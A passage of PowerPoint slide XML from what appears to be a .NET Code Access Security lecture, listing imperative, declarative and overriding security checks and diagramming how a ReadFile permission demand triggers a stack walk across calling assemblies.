        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Types of Security Checks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200718" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="4775200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Imperative security checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Declarative security checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Apply to methods or classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overriding security checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prevent the stack walk</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Security Check Stack Walks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191517" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="873125" y="1344613"/>
            <a:ext cx="2878138" cy="5097462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzPct val="70000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Call Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191518" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2798763" y="5016500"/>
            <a:ext cx="3255962" cy="1343025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ADE2A1">
              <a:alpha val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="669900"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Security System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191519" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="3494088"/>
            <a:ext cx="2057400" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4E4BF"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YourAssembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191520" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="1816100"/>
            <a:ext cx="2057400" cy="773113"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BBCDE3"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SomeAssembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191521" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="5172075"/>
            <a:ext cx="2057400" cy="773113"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CBEDC3"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.NET Framework Assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="336550" y="2598738"/>
            <a:ext cx="1774825" cy="889000"/>
            <a:chOff x="526" y="1501"/>
            <a:chExt cx="1118" cy="560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191523" name="Line 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1257" y="1501"/>
              <a:ext cx="0" cy="560"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="es-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191524" name="AutoShape 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="526" y="1657"/>
              <a:ext cx="1118" cy="244"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEE7F1"/>
            </a:solidFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Call to ReadFile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 37"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="336550" y="4284663"/>
            <a:ext cx="1774825" cy="889000"/>
            <a:chOff x="526" y="2563"/>
            <a:chExt cx="1118" cy="560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191526" name="Line 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1257" y="2563"/>
              <a:ext cx="0" cy="560"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="es-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191527" name="AutoShape 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="526" y="2720"/>
              <a:ext cx="1118" cy="244"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EEEFD7"/>
            </a:solidFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Call to ReadFile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191528" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3365500" y="2689225"/>
            <a:ext cx="0" cy="1377950"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191529" name="AutoShape 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="2317750"/>
            <a:ext cx="1800225" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DEE7F1"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grant: Execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191530" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4946650" y="1312863"/>
            <a:ext cx="3933825" cy="3532187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC">
              <a:alpha val="85001"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1. An assembly requests access to a method in your assembly </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2. Your assembly passes the request to a .NET Framework assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>3. The security system ensures that all callers in the stack have the required permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="292100" indent="-292100" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>4. The security system grants access or throws an exception </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191531" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3365500" y="4351338"/>
            <a:ext cx="0" cy="1468437"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191532" name="AutoShape 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="5810250"/>
            <a:ext cx="1800225" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E8F6E4"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grant: ReadFile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191533" name="AutoShape 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="3979863"/>
            <a:ext cx="1800225" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFD7"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grant: ReadFile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191534" name="AutoShape 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2797175" y="4637088"/>
            <a:ext cx="2044700" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DFD2EE"/>
          </a:solidFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="333333"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Permission Demand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191535" name="AutoShape 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3873500" y="5473700"/>
